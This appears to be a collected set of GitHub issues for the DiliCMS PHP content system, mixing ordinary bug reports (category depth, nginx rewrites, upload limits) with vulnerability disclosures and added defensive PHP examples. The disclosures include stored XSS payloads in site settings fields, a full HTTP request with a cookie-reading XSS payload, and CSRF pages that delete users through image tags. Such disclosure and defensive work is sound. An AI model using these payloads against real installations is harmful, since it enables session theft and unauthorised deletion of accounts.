chekun / dilicms
DiligentCMS
Home Page: http://www.dilicms.com/
License: MIT License
+ Default value of the 4 fields set to 0 when adding a new table
* id changed to unsigned
XSS Vulnerability Found in DiliCMS 2.4.0 in tab=site_attachment
Software Link : https://github.com/chekun/DiliCMS/tree/v2.4.0
POC :
POST /DiliCMS-2.4.0/admin/index.php/setting/site?tab=site_attachment HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/DiliCMS-2.4.0/admin/index.php/setting/site?tab=site_attachment
Content-Type: application/x-www-form-urlencoded
Content-Length: 273
Cookie: dili_session=xxxxx
Connection: close
Upgrade-Insecure-Requests: 1
dilicms_csrf_token=6f4a225b12c2c472984c72af51fdf31b&attachment_url=aaa%22%3E%3Cbody+onload%3Dalert%28document.cookie%29%3E&attachment_dir=attachments&attachment_type=.jpg%3B.gif%3B*.png%3B*.doc%20%22+onmouseover%3Dprompt%28907460%29+bad%3D%22&attachment_maxupload=2097152
In the category model I created a 5-level category xx, then when adding content in content management I found: "Category management > XX > level-1 category > level-2 category > level-3 category". At most three levels are displayed; the fourth level shows up as the first level.
I also found that subcategories can be added to unlimited depth.
From the third level on, the level field in the database is wrong.
After changing the logo path and refreshing the cache, the logo does not change; it is still logo.gif.
Error Number: 1146
Table 'app_hainuo.dili_u_c_keywords' doesn't exist
SELECT * FROM (dili_u_c_keywords
)
Filename: /data1/www/htdocs/153/hainuo/4/models/dili/category_mdl.php
Line Number: 21
This problem appeared when I created a category model.
I could not find where the problem is, so I am raising it here for a solution.
The end result is that the model was created successfully but an error page was returned. Test environment: SAE.
Replace the editor xheditor with kindeditor
Created a category model cat and a content model item; item has a field that uses a dropdown (data model) (INT) with cat|slug selected.
After modifying content in category management, the item dropdown in content management does not immediately show the modified categories; the category model management has to be refreshed manually.
For example
$setting['cities'] = [
    'nanjing' => [
        'name' => '南京',
        'districts' => ['玄武区', '鼓楼区']
    ]
];
then to get "南京" you only need
echo setting('cities.nanjing.name');
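One way to implement the dot-notation setting() lookup described above, as an added example (not DiliCMS's own code; assumes PHP 8 for the mixed type, and the function signature is this example's own): the path is split on dots and walked through the nested array, falling back to a default whenever a segment is missing or an intermediate value is not an array, instead of emitting notices.

```php
<?php
// Added example, not DiliCMS code: dot-notation lookup over a nested
// settings array. Function name and signature are this example's own.

declare(strict_types=1);

/**
 * Resolve "a.b.c" against a nested array. Returns $default when any segment
 * is missing or when an intermediate value is not an array, so a bad path
 * never triggers a notice or returns a partial structure by accident.
 */
function setting(array $settings, string $path, mixed $default = null): mixed
{
    $node = $settings;
    foreach (explode('.', $path) as $segment) {
        if (!is_array($node) || !array_key_exists($segment, $node)) {
            return $default;
        }
        $node = $node[$segment];
    }
    return $node;
}

// Constructed data, matching the shape shown in the post above.
$setting = [
    'cities' => [
        'nanjing' => [
            'name'      => '南京',
            'districts' => ['玄武区', '鼓楼区'],
        ],
    ],
];

echo setting($setting, 'cities.nanjing.name'), PHP_EOL;          // the city name
echo setting($setting, 'cities.nanjing.districts.1'), PHP_EOL;   // numeric segments address list items
var_dump(setting($setting, 'cities.shanghai.name'));              // missing branch falls back to the default
var_dump(setting($setting, 'cities.nanjing.name.first', 'n/a'));  // descending into a string also falls back
```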
1. Log in to the backstage
http://127.0.0.1/admin/index.php
2. Go to System setting -> site setting
3. Add the following payload to the second textbox, and submit.
payload: site_domain=http://www.dilicms.com/" onmouseover="alert(1)
Then move your mouse over the second textbox, and the stored XSS is triggered.
1. Log in to the backstage
http://127.0.0.1/admin/index.php
2. Go to System setting -> site setting
3. Add the following payload to the first textbox, and submit.
payload: site_name=DiliCMS'"/></script><script>alert(1)</script>
And then the stored XSS is triggered.
Under nginx, DiliCMS without special configuration only shows the home page; navigating to any other page returns a 404. I then added the following configuration to nginx.conf:
server {
    listen 80;
    root /www/web/xxx/;
    server_name xxx.com xxx.com;
    index index.html index.php index.htm;
    error_page 400 /errpage/400.html;
    error_page 403 /errpage/403.html;
    error_page 404 /errpage/404.html;
    error_page 503 /errpage/503.html;
    location ~ ^(/(application|system|services|shared|admin/backup|admin/config|admin/controllers|admin/core|admin/errors|admin/hooks|admin/language))/ {
        deny all;
    }
    location / {
        if ($request_uri ~* index/?$) {
            rewrite ^/(.*)/index/?$ /$1 permanent;
        }
        if (!-d $request_filename) {
            rewrite ^/(.+)/$ /$1 permanent;
        }
        if (!-e $request_filename) {
            rewrite ^/(.*)$ /index.php/$1 last;
            break;
        }
        set $admin '';
        if ($request_uri ~* ^/admin/) {
            set $admin A;
        }
        if ($request_uri ~* ^/install/) {
            set $admin B;
        }
        if (!-e $request_filename) {
            set $admin "X${admin}";
        }
        if ($admin = XA) {
            rewrite ^/admin/(.*)$ /admin/index.php?/$1 last;
            break;
        }
        if ($admin = XB) {
            rewrite ^/install/public/(.*)$ /install/public/index.php?/$1 last;
        }
        if ($admin = X) {
            rewrite ^/(.*)$ /index.php?/$1 last;
            break;
        }
    }
    location ~ \.php($|/) {
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
        fastcgi_split_path_info ^(.+\.php)(.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_param SCRIPT_FILENAME /www/web/xxx$fastcgi_script_name;
        fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
        include fastcgi_params;
    }
    location ~ /\.ht {
        deny all;
    }
}
After adding it, pages can be navigated and the admin back end works fine, but uploading images fails. The path is as follows:
'/admin/index.php/content'
It is probably caused by the configuration above; I do not know how to solve this now and hope to get an answer!
Using the built-in swfloader, files under 8M can be uploaded but files over 8M cannot. I am uploading MOV files!
The server configuration is fine; I have searched for ages without solving it. Asking for help.
If needed, I can send SSH and FTP access for you to look at.
- [x] Upgrade CI to CodeIgniter3.0-dev
- [x] Try migration for managing the database
private function watch(), line 105
in_array($plugin['name'], $this->app->acl->rights['plugins'])
I think it should be changed to in_array($key, $this->app->acl->rights['plugins'])
1. Log in to the backstage
http://127.0.0.1/DiliCMS-develop-3.x/admin/index.php
2. Go to System setting -> site setting
3. Add the following payload to the fourth textbox
1"<script>alert(123)</script>
4. Save and view the announcement we just posted
And then the stored XSS is triggered.
Software Link : https://github.com/chekun/DiliCMS
After the administrator has logged in, open the page
test.html delete user POC:
<html>
<body>
<img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
</body>
</html>
test2.html delete group POC:
<html>
<body>
<img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
</body>
</html>
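The two POCs above work because user/del/{id} and role/del/{id} are performed by a plain GET that carries only the session cookie, so any page the administrator visits can trigger them with an <img> tag. As an added example (not DiliCMS's own code; the names csrfToken, csrfField, requireCsrf, deleteUser and the $session array are this example's assumptions), here is the defensive pattern: the action accepts POST only, and the POST must carry a token bound to the administrator's session, compared in constant time. The request from the POC fails the method check before any token logic runs.

```php
<?php
// Added example, not DiliCMS code: protecting state-changing admin actions
// from cross-site requests. Helper names are this example's own.

declare(strict_types=1);

/** Return the session's CSRF token, creating one on first use. */
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every admin form that performs a write. */
function csrfField(array &$session): string
{
    return sprintf(
        '<input type="hidden" name="dilicms_csrf_token" value="%s">',
        htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8')
    );
}

/**
 * Gate for a state-changing action. Returns true only for a POST whose
 * token matches the session token; everything else is refused.
 */
function requireCsrf(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;                       // a GET (e.g. from <img src>) can never delete
    }
    $sent  = $post['dilicms_csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $sent === '' || $known === '') {
        return false;
    }
    return hash_equals($known, $sent);      // constant-time comparison
}

/** Simulated controller for /admin/index.php/user/del/{id}. */
function deleteUser(int $id, string $method, array $post, array $session): string
{
    if (!requireCsrf($method, $post, $session)) {
        return "403: refused to delete user $id";
    }
    return "deleted user $id";
}

// Constructed requests: the session belongs to a logged-in administrator.
$session = [];
$token   = csrfToken($session);
echo csrfField($session), PHP_EOL;          // what the legitimate admin form embeds

// 1. The <img src=".../user/del/1"> from the POC: a cookie-bearing GET with no body.
echo deleteUser(1, 'GET', [], $session), PHP_EOL;

// 2. A forged cross-site POST: the other origin cannot read the token, so it is wrong.
echo deleteUser(1, 'POST', ['dilicms_csrf_token' => str_repeat('0', 64)], $session), PHP_EOL;

// 3. The legitimate admin form submission carries the session token.
echo deleteUser(1, 'POST', ['dilicms_csrf_token' => $token], $session), PHP_EOL;
```

Setting the session cookie with the HttpOnly and SameSite=Lax (or Strict) attributes is a useful second layer: modern browsers then omit the cookie from cross-site image requests entirely, but the token check above is what holds when a browser does not.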
DiliCMS V2.1 DEV has an installation BUG; I downloaded it from here (https://github.com/DiliCMS/DiliCMS)
The view-layer file with the BUG is \install\views\install.php
Line 7 is wrong
It should be like this
1. Log in to the backstage
http://127.0.0.1/admin/index.php
2. Go to System setting -> site setting
3. Add the following payload to the third textbox, and submit.
payload: site_logo=images/logo.gif" onmouseover="alert(1)
Then move your mouse over the third textbox, and the stored XSS is triggered.
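The stored XSS reports on this page (the 2.4.0 site_attachment POC, and the site_domain, site_name, announcement and site_logo reports) share one root cause: a setting saved by the administrator is written back into a value="..." attribute of the settings form without escaping, so a quote in the value closes the attribute. As an added example (not DiliCMS's own code; the helpers e(), settingInput() and validateAttachmentTypes() are this example's assumptions), here is the defensive pattern: escape every setting for its HTML context on output, and additionally validate fields whose format is known (attachment_type is a ';'-separated list of extensions) on input. The constructed inputs reuse the payload shapes from the reports to show they stay inert.

```php
<?php
// Added example, not DiliCMS code: rendering admin settings safely.
// Two controls: context-aware escaping on output, and a strict allow-list
// on input for fields whose format is known. Helper names are this example's own.

declare(strict_types=1);

/** Escape a value for use inside a double-quoted HTML attribute or a text node. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render one settings input; the name is escaped too, so a bad key cannot break out either. */
function settingInput(string $name, string $value): string
{
    return sprintf('<input type="text" name="%s" value="%s">', e($name), e($value));
}

/**
 * Validate attachment_type, a ';'-separated list of extensions such as ".jpg;.gif;.png".
 * Returns the normalised list, or null if any entry is not a plain extension.
 */
function validateAttachmentTypes(string $raw): ?string
{
    $clean = [];
    foreach (explode(';', $raw) as $ext) {
        $ext = ltrim(trim($ext), '*');          // "*.png" is normalised to ".png"
        // Accept only a dot followed by 1..10 letters or digits; anything else rejects the whole value.
        if (!preg_match('/^\.[A-Za-z0-9]{1,10}$/', $ext)) {
            return null;
        }
        $clean[] = strtolower($ext);
    }
    return implode(';', array_unique($clean));
}

// Constructed inputs mirroring the payload shapes in the reports on this page.
$hostile = [
    'site_domain'     => 'http://www.dilicms.com/" onmouseover="alert(1)',
    'site_name'       => 'DiliCMS\'"/></script><script>alert(1)</script>',
    'site_logo'       => 'images/logo.gif" onmouseover="alert(1)',
    'attachment_url'  => 'aaa"><body onload=alert(document.cookie)>',
    'attachment_type' => '.jpg;.gif;*.png;*.doc " onmouseover=prompt(907460) bad="',
];

foreach ($hostile as $name => $value) {
    // Every quote and angle bracket becomes an entity, so the value stays inside the attribute.
    echo settingInput($name, $value), PHP_EOL;
}

// Input-side check: the tampered attachment_type is rejected (null), a sane one is kept and normalised.
var_dump(validateAttachmentTypes($hostile['attachment_type']));
var_dump(validateAttachmentTypes('.jpg;.gif;*.png;*.doc'));
```

Escaping on output is the control that closes all five reports at once, because it does not depend on guessing which characters an attacker will send; the input allow-list is an extra layer for fields like attachment_type where the legitimate format is narrow enough to describe exactly.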
Finish the guide for writing new modules on the wiki
https://github.com/DiliCMS/DiliCMS/wiki
1. The backstage address
http://127.0.0.1/DiliCMS-develop-3.x/admin/index.php
2. Log in and use Burp Suite to intercept the packets; we can then see that the user credentials are transmitted over an unencrypted channel.